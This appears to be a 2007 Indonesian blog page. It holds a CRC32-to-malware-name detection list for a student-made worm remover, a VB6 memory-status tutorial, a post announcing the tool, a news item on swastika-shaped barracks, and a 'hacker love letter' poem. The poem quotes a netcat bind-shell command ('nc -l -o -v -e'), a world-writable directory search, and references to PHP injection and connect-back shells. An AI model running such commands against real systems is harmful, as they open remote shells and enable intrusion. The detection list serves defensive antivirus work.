333E2A23=Worm/w32.Magistr.A
33462B41=Worm/w32.Generic
334758DB=Trojan/tr.Punter.A
3347E412=Worm/w32.Spammer
33497FC4=Worm/w32.Ifor
334C4CA5=Worm/w32.PS-Based
3353335F=Backdoor.Phoenix
3358CBE8=Worm/w32.PS-Based
3359C938=Worm/w32.Stoned-Based.M
335A2D97=Worm/w32.Hllc
335D65FC=Backdoor.Silencer.A
335DC71F=Worm/w32.HongKang
335E3F85=Worm/w32.TaiPan
335FE18F=Worm/w32.Mix.B
3362C42E=Worm/w32.Vcc-Based
336BA2FE=Backdoor.Bla
336F1FD7=Worm/w32.Icommand
3372E219=Trojan/tr.Farenheit
3379B9C3=Worm/w32.Murphy
3380B54E=Worm/w32.PS-Based
3384AEFC=Worm/w32.Murphy
33853807=Trojan/tr.Fpi
338759CE=Worm/w32.Advent
3387E0E2=Backdoor.Neurotic.A
3388200D=Trojan/tr.Necro
338CD151=Worm/w32.Saratoga
33905EA8=Worm/w32.VKit-Based
3391FFA3=Worm/w32.Retch
3395E1A5=Worm/w32.SillyC
33963548=Worm/w32.Akuku
33A2F8C1=Worm/w32.Exploit.A
33A352F2=Worm/w32.PS-Based
33A65655=Worm/w32.PS-Based
33A762FA=Worm/w32.Birgit
33A7B661=Worm/w32.Jerusalem.A
33B7214C=Worm/w32.Krile
33B7BDC7=Trojan/tr.WIC
33B916D9=Backdoor.Radix
33BE073A=Trojan/tr.Darkness
33C1CF94=Worm/w32.Bw-Based
33D4B257=Backdoor.Psychward.A
33D4C314=Worm/w32.Intended
33D4D96F=Trojan/tr.Driver
33D87ADA=Worm/w32.Datacrime
33DCF790=Worm/w32.Claudia
33DE3922=Worm/w32.KbrBug
33DFB532=Worm/w32.Harlem
33E989DC=Worm/w32.Gippo.D
33EA9C21=Backdoor.TDS
33EEBB68=Worm/w32.Keeper
33EFCC8D=Worm/w32.Mx
33F65A2F=Worm/w32.ExeHeader
33F6863A=Worm/w32.Riot
34016060=Backdoor.Intruder
34058200=Backdoor.Bla
340F7629=Worm/w32.PS-Based
341293B4=Worm/w32.SillyRE
341E2E61=Worm/w32.Pyros
3420D16A=Trojan/tr.Perfect
34252027=Worm/w32.PS-Based
3425A69F=Worm/w32.Shadow
34290125=Backdoor.NetSnooper
342D3629=Worm/w32.IC
342FB1F6=Worm/w32.FaxFree.A
3430EAA1=Worm/w32.PS-Based
34313902=Worm/w32.Klon
3432BE7C=Worm/w32.Wypi
3435C790=Worm/w32.Gotyou
34363B18=Worm/w32.Hidenowt.B
343CE45F=Worm/w32.Zarma
343E64B4=Backdoor.Prosiak
343ECC17=Worm/w32.Legs
344417DB=Worm/w32.Liberty.A
344633F3=Trojan/tr.Fight
3447E0BC=Trojan/tr.Menace
344DC4BC=Worm/w32.DiskFiller.G
344EFEB8=Trojan/tr.Joiner
34506FB0=Worm/w32.PS-Based
34513202=Worm/w32.Trinidad
34536E76=Worm/w32.Hare
34568510=Worm/w32.Jerusalem
34574AC9=Worm/w32.Godog
345FA750=Worm/w32.PS-Based
3468B03E=Worm/w32.July13.A
346DE4C5=Worm/w32.Hatred.A
347009CF=Trojan/tr.Aol
347167B2=Backdoor.Netspy.C
3475DA93=Worm/w32.Panther
34777B17=Worm/w32.MacGyver.B
347CBEB4=Trojan/tr.ShareC
3480A624=Trojan/tr.Pokemon
3480E900=Worm/w32.Constructor
348F7C3B=Worm/w32.Troi
3492C845=Worm/w32.Lcamtuf
3494F41B=Backdoor.InCommander
349792B6=Worm/w32.Hllp
349A7121=Worm/w32.Buzum
349F9697=Worm/w32.DarkElf
34A0D78E=Worm/w32.Ava
34A78CFF=Worm/w32.Natas
34A99843=Worm/w32.Riot
34AC7179=Worm/w32.Scapny
34B0BC9D=Worm/w32.PressTurbo
34B70DEC=Worm/w32.Screen
34BC9B10=Worm/w32.Constructor
34C64900=Worm/w32.Lazuli
34C79634=Worm/w32.Repus
34CA0BB9=Backdoor.RM
34CA732E=Worm/w32.SillyWR.B
34D7CDA1=Worm/w32.Spaces
34DA92D8=Trojan/tr.Gip.D
34E4D144=Worm/w32.Yankee
34E70761=Worm/w32.G2-Based
34EB1772=Worm/w32.Vt
34EB5F5D=Worm/w32.SkyNet
34ED0967=Worm/w32.Boza.A
34F5881F=Worm/w32.InvictusDLL
34FB4072=Trojan/tr.Joiner.G
34FC04BD=Trojan/tr.Coced
34FC453B=Worm/w32.Dutch.A
34FF700D=Worm/w32.Kela
3500B1EE=Worm/w32.PS-Based
35080E39=Trojan/tr.Waster.B
350CA93E=Worm/w32.Tequila
350CAD2C=Worm/w32.VKit-Based
350CCC26=Worm/w32.PS-Based
350CD771=Trojan/tr.PS
3511E4E8=Worm/w32.Prudents
351B181B=Trojan/tr.WK
351D6BB9=Worm/w32.Jerusalem
3521E81F=Backdoor.BackEnd
35266286=Backdoor.RUX
352C8DA7=Trojan/tr.Wintcp.B
3535E7BD=Worm/w32.Systa
3537A4A8=Worm/w32.WINSKiller
3537F360=Backdoor.RemoteHack
3542ACC8=Backdoor.WMRemote
35451D5A=Worm/w32.PS-Based
354C1704=Trojan/tr.Regback
354C940E=Worm/w32.YanShort.B
354ECD4A=Worm/w32.Vrunning
3554C0DA=Worm/w32.Rage
3559BC73=Worm/w32.Constructor
355C9522=Worm/w32.VirTool.A
355D1383=Worm/w32.DmSetup.C
355ECB98=Worm/w32.Harry.A
355F00FF=Trojan/tr.Geoff
355F825D=Backdoor.MasterParadise.E
355FC78C=Worm/w32.Acid
3560B798=Trojan/tr.Barok
3561071E=Backdoor.NetTrash.A
35629AC0=Worm/w32.Lokjaw
3565599D=Worm/w32.Rape
3568D16B=Backdoor.Gift
3568F4E9=Worm/w32.Dilber
356AB4DF=Worm/w32.IntMaster
3571185D=Worm/w32.Darth
357BBFD8=Worm/w32.Astra.B
357C7F38=Worm/w32.Nrlg-Based
357D3B7C=Backdoor.Ashley.B
357F0D9A=Worm/w32.Vienna-Based
357F96EB=Worm/w32.PoshKill.A
358412D4=Worm/w32.Doom
35861E24=Backdoor.BO
35870C6B=Worm/w32.Nrlg-Based
358E9A5E=Worm/w32.Hllp
359DDFA1=Worm/w32.VirTool
35A3ED9E=Worm/w32.Flash
35A7350C=Worm/w32.VKit-Based
35A7B111=Worm/w32.SillyC
35AA599F=Worm/w32.V
35ABE5A4=Backdoor.PCInvader
35AD1C08=Worm/w32.Vcl-Based
35AFF78E=Backdoor.SubSeven
35B16705=Trojan/tr.Jerk
35B44958=Worm/w32.PS-Based
35B7DE80=Worm/w32.Intended
35B9A575=Worm/w32.Constructor
35BE64F0=Worm/w32.Lerm
35C47C1B=Worm/w32.Tequila.C
35C5E7D6=Worm/w32.Constructor
35D1DE31=Worm/w32.Jerusalem.A
35D2DC88=Worm/w32.Jorgito
35D2F34C=Worm/w32.Kriz
35D300FF=Backdoor.BO2K
35D96EBA=Worm/w32.Fabi.A
35DAF6F8=Worm/w32.Hllc
35DB3FED=Worm/w32.SofiaTerminator
35E3B2A1=Worm/w32.Hllp.B
35E8E0B2=Worm/w32.Bw-Based
35E9942F=Worm/w32.PolyEngine
35E9E076=Worm/w32.PS-Based
35EE1FD2=Backdoor.SubSeven
35F93F00=Worm/w32.Gula
35F95CF5=Worm/w32.Stalker
35FBDD22=Trojan/tr.WT32
36002725=Worm/w32.Jerusalem
36067C35=Worm/w32.Kuarahy
3608485A=Worm/w32.AOC
36092E6E=Backdoor.Progenic.C
360BB413=Worm/w32.PPZ
360DE114=Backdoor.BO2K.A
360F8193=Worm/w32.Herman
3613E3E8=Backdoor.Bionet
3615EF65=Trojan/tr.Havoc
3619236C=Worm/w32.Tomsk
361B6892=Backdoor.Netbus
361E1386=Worm/w32.Nazi
3620B68C=Worm/w32.Helloween
362365CE=Worm/w32.Dashel
3627C184=Worm/w32.OneHalf
36296A1F=Worm/w32.PS-Based
362CE3F0=Backdoor.Td

----------------------[ Stop Copy Here ]----------------

Check Your Memory Status

2007-12-22T13:19:00.002+07:00

Okeh langsung aja, Dalam aplikasi yang akan kita buat kali ini kita membutuhkan

1 buah form
1 buah frame
7 buah label
14 buah label
1 buah timer ( interval di sett 200)

buat design seperti gambar dibawah ini

design aplikasi yang akan kita buat

lalu copy paste kan script berikut ke dalam form

------------------- [ Start Copy Here]--------------------

Option Explicit

Const SR = 0
Const GDI = 1
Const USR = 2
Const VER_PLATFORM_WIN32s = 0
Const VER_PLATFORM_WIN32_WINDOWS = 1
Const VER_PLATFORM_WIN32_NT = 2

Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Private Type MEMORYSTATUS
dwLength As Long
dwMemoryLoad As Long
dwTotalPhys As Long
dwAvailPhys As Long
dwTotalPageFile As Long
dwAvailPageFile As Long
dwTotalVirtual As Long
dwAvailVirtual As Long
End Type

Private Declare Sub GlobalMemoryStatus Lib "kernel32" (lpBuffer As MEMORYSTATUS)

Private Declare Function pBGetFreeSystemResources Lib "rsrc32.dll" _
Alias "_MyGetFreeSystemResources32@4" (ByVal iResType As Integer) As Integer

Private Declare Function GetVersionEx Lib "kernel32" _
Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

Private Sub Form_Load()

MsgBox "Created by : YaDoY SoFtWaRe DeVeLoPmEnT 2007", vbOKOnly + vbInformation, "YaDoY SoFtWaRe DeVeLoPmEnT"
End Sub

Private Sub Timer1_Timer()
Dim MS As MEMORYSTATUS
Dim OSInfo As OSVERSIONINFO

MS.dwLength = Len(MS)
Call GlobalMemoryStatus(MS)
With MS
lbl(0) = Format$(.dwTotalPhys / 1024, "#,###.##")
lbl(1) = Format$(.dwAvailPhys / 1024, "#,###.##")
lbl(2) = Format$(.dwTotalVirtual / 1024, "#,###.##")
lbl(3) = Format$(.dwAvailVirtual / 1024, "#,###.##")
lbl(4) = Format$(.dwTotalPageFile / 1024, "#,###.##")
lbl(5) = Format$(.dwAvailPageFile / 1024, "#,###.##")
lbl(6) = Format$(.dwMemoryLoad, "##0.00") & " %"
End With
End Sub

------------------- [ Stop Copy Here]-------------------
Lalu jalankan project tersebut dengan menekan F5 pada keyboard... So aplikasi yang tersebut sudah jadi. Dengan menggunakan aplikasi ini kita dapat mengetahui status memory komputer kita saat ini..

--- Thanx's Smoga bermanfaat ----

Himatika Perbanas ViriRemover [Beta Version 1.0.3]

2007-12-22T13:19:00.001+07:00

Silahkan download di

http://www.geocities.com/yadoy666/download/Himatika_Perbanas_ViriRemover.zip

Himatika Perbanas ViriRemover [Beta Version 1.0.3]
-------------------------------------------------------
Copyright (C) YaDoY SoFtWaRe DeVeLoPmenT, 2007

Engine Version : 1.0.3
Release : 17 September 2007
Last Update : 17 September 2007
License : Freeware

URL :http://www.geocities.com/yadoy666/

Contact Author :yadoy666@gmail.com
-------------------------------------------------------

Sebenernya Aplikasi ini kurang tepat apabila disebut sebagai sebuah anti virus, mungkin aplikasi ini lebih tepat dsebut sebagai aplikasi Worm Removal karena aplikasi ini belum bisa membersihkan virus yang menempel pada sebuah file. Aplikasi ini hanya dapat membasmi malware yang tidak menempel pada sebuah file. Saya membangun aplikasi ini berdasarkan bebrapa source code yang saya dapat dari internet tepatnya di

http://www.Planet-Source-Code.com/vb/scripts/ShowCode.asp?txtCodeId=62342&lngWId=1

Sejak pertama kali saya release di beberapa forum anak negeri yang membahas tentang Virus dan Malware, Aplikasi ini telah banyak mendapat respon dari teman-teman yang telah mencoba aplikasi tersebut. Respon yang di berikan pun bermacam-macam ada yang baik dan tidak sedikit juga yang buruk. Tapi semua respon tersebut telah saya tampung untuk kemudian saya lakukan perbaikan pada beberapa kelemahan dan kekurangan yang ada pada aplikasi ini.

Walaupun masih banyak kekurangan dari aplikasi ini, tetapi aplikasi ini memiliki beberapa kelebihan. Kelebihan tersebut antara lain :

Database malware yang sangat banyak meliputi malware yang berasal dari dalam dan luar negeri. Kurang lebih database dari aplikasi ini berjumlah 2500 malware baik dalam maupun luar negeri
Dilengkapi dengan beragam fitur antara lain Virus Scanner, Proces Viewer, CRC Generator serta Registry Options yang berguna untuk memodofikasi sistem operasi Windows yang anda miliki
User dapat melakukan update manual dengan cara menambahkan nilai CRC32 dari suatu file yang dicurigai sebagai virus/worm/malware kedalam database eksternal aplikasi ini. Nilai CRC32 dari suatu file yang dicurigai merupakan sebuah virus/worm/malware dapat dicari dengan menggunakan fitur CRC32 Generator
Menggunakan metode CRC32 untuk melakukan scanning sehingga kesalahn deteksi relatif kecil

Project antivirus ini merupakan project untuk skripsi saya. Oleh karena itu saya mohon kritik, masukan dan saran dari teman-teman semua. Saya akan meng Open Source kan Aplikasi ini untuk dikembangkan oleh teman-teman yang lain tapi munkin setelah skripsi saya ini selesai.

Akhir kata, terimakasih atas kesedian teman-teman untuk mencoba aplikasi sederhana buatan saya ini. Saya tunggu kritik, saran dan masukan dari teman-teman semua

Himatika Perbanas ViriRemover is freeware but without any warranty. Use it with your own risk

Google Earth nemu barak militer berbentuk lambang nazi

2007-12-22T13:16:00.000+07:00

Barak berlambang swastika Nazi (softpedia)

Fino Yurio Kristo - detikinet

Jakarta - Era Nazi Jerman, kelompok pembantai Yahudi dan pencetus Perang Dunia mungkin telah lama berlalu. Namun gaungnya tampaknya masih beredar hingga zaman modern.

Hal ini misalnya, terbukti dari penemuan yang diperlihatkan di Google Earth. Sebuah foto menampakkan bahwa Angkatan Laut Amerika Serikat punya sebuah barak militer berbentuk sama persis dengan simbol Nazi Jerman, Swastika di negara bagian California selatan.

Bangunan ini ditemukan oleh beberapa pengguna internet yang mengakses Google Earth. Karenanya, lembaga Anti Defamation League (ADL), sebuah kelompok yang mengurusi masalah orang Yahudi pun melobi militer untuk memodifikasi bangunan itu. Setelah perjuangan beberapa waktu, Morris Casuto, Direktur Regional ADL berhasil 'memaksa' militer untuk merekonstruksi ulang bangunan itu dengan biaya 300.000 poundsterling.

"Angkatan laut menyadari bahwa bangunan ini mengandung simbol kematian ribuan orang dan tak sesuai sebagai basis militer," ungkap Morris yang dilansir Softpedia dan dikutip detikINET, Sabtu (29/9/2007).

Hingga saat ini, tak ada yang tahu pasti siapa pembangun barak militer berbentuk Swastika yang tertangkap kamera Google Earth itu. Beberapa rumor pun telah berkembang. Salah satunya, barak itu diduga dibuat oleh arsitek Jerman pada tahun 1960-an sebagai simbol bahwa negeri mereka sebenarnya tidak kalah dalam Perang Dunia.

Google Earth memang makin terbukti kegunaannya untuk mengetahui berbagai macam hal baru dari seluruh dunia. Namun, dengan penemuan seperti di atas, pihak pemerintah dalam hal ini militer bisa terusik karena area yang seharusnya tersembunyi bisa kini diketahui banyak orang.

Surat Cinta seorang hacker

2007-12-22T03:54:00.001+07:00

Seandainya hatimu adalah sebuah system,
maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,
tapi aku hanya berani ping di belakang anonymouse proxy,
inikah rasanya jatuh cinta
sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu,
pake PHP injection Terus aku ls -la; find / -perm 777 -type d,
sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?.
apa aku harus pasang backdor "Remote Connect-Back Shell"
jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq
untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,
aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry,
dan menyeting error pagemu " The page cannot be found Coz Has Been Owned by Someone get out!"
aku janji gak bakalan ada macelinious program
atau service yang hidden,
karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku,
kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, ...?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan,
Ga ada anti virus yang dapat menangkalnya selain ...kamu.